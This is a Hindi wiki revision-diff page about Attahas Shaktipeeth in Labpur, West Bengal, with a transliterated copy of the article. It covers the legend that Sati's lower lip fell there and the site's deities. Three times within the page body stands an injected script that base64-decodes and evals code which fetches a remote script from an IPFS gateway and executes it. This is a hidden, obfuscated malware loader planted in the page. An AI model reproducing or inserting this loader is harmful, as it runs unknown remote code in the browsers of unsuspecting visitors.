Difference between revisions of "अट्टहास शक्तिपीठ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 22: Line 22:
 
'''अट्टहास शक्तिपीठ''' [[शक्तिपीठ|51 शक्तिपीठों]] में से एक है। [[हिन्दू धर्म]] के [[पुराण|पुराणों]] के अनुसार जहां-जहां [[सती]] के अंग के टुकड़े, धारण किए [[वस्त्र]] या [[आभूषण]] गिरे, वहां-वहां शक्तिपीठ अस्तित्व में आये। ये अत्यंत पावन [[तीर्थ स्थान|तीर्थस्थान]] कहलाये। ये तीर्थ पूरे भारतीय उपमहाद्वीप पर फैले हुए हैं। देवीपुराण में [[शक्तिपीठ|51 शक्तिपीठों]] का वर्णन है।
 
'''अट्टहास शक्तिपीठ''' [[शक्तिपीठ|51 शक्तिपीठों]] में से एक है। [[हिन्दू धर्म]] के [[पुराण|पुराणों]] के अनुसार जहां-जहां [[सती]] के अंग के टुकड़े, धारण किए [[वस्त्र]] या [[आभूषण]] गिरे, वहां-वहां शक्तिपीठ अस्तित्व में आये। ये अत्यंत पावन [[तीर्थ स्थान|तीर्थस्थान]] कहलाये। ये तीर्थ पूरे भारतीय उपमहाद्वीप पर फैले हुए हैं। देवीपुराण में [[शक्तिपीठ|51 शक्तिपीठों]] का वर्णन है।
  
*अट्टाहास शक्तिपीठ [[पश्चिम बंगाल]] के 'लाबपुर' (लामपुर) में स्थित है। यह [[वर्धमान]] रेलवे स्टेशन से लगभग 95 किलोमीटर आगे कटवा-अहमदपुर रेलवे लाइन पर है।
+
*अट्टाहास शक्तिपीठ [[पश्चिम बंगाल]] के 'लाबपुर' (लामपुर) में स्थित है। यह वर्धमान रेलवे स्टेशन से लगभग 95 किलोमीटर आगे कटवा-अहमदपुर रेलवे लाइन पर है।
 
*इस शक्तिपीठ के बारे में कहा जाता है कि यहाँ सती का "नीचे का होठ (अधरोष्ठ)" गिरा था।
 
*इस शक्तिपीठ के बारे में कहा जाता है कि यहाँ सती का "नीचे का होठ (अधरोष्ठ)" गिरा था।
 
*यह स्थल 'अट्टहास शक्तिपीठ' कहा जाता है, जो लामपुर स्टेशन से नजदीक ही थोड़ी दूर पर है।
 
*यह स्थल 'अट्टहास शक्तिपीठ' कहा जाता है, जो लामपुर स्टेशन से नजदीक ही थोड़ी दूर पर है।

Latest revision as of 05:45, 27 September 2014

attahas shaktipith
varnan 'attahas shaktipith' bharatavarsh ke ajnat 108 evan jnat 51 pithoan mean se atyant prachin siddhapith hai.
sthan labapur, pashchim bangal
devi-devata 'phullara' (sati) tatha 'visvesh' (shiv)
sanbandhit lekh shaktipith, sati
pauranik manyata manyata hai ki yahaan devi sati ka "niche ka hoth (adharoshth)" gira tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

attahas shaktipith 51 shaktipithoan mean se ek hai. hindoo dharm ke puranoan ke anusar jahaan-jahaan sati ke aang ke tuk de, dharan kie vastr ya abhooshan gire, vahaan-vahaan shaktipith astitv mean aye. ye atyant pavan tirthasthan kahalaye. ye tirth poore bharatiy upamahadvip par phaile hue haian. devipuran mean 51 shaktipithoan ka varnan hai.

  • attahas shaktipith pashchim bangal ke 'labapur' (lamapur) mean sthit hai. yah vardhaman relave steshan se lagabhag 95 kilomitar age katava-ahamadapur relave lain par hai.
  • is shaktipith ke bare mean kaha jata hai ki yahaan sati ka "niche ka hoth (adharoshth)" gira tha.
  • yah sthal 'attahas shaktipith' kaha jata hai, jo lamapur steshan se najadik hi tho di door par hai.
  • yahaan ki sati 'phullara' tatha shiv 'visvesh' haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>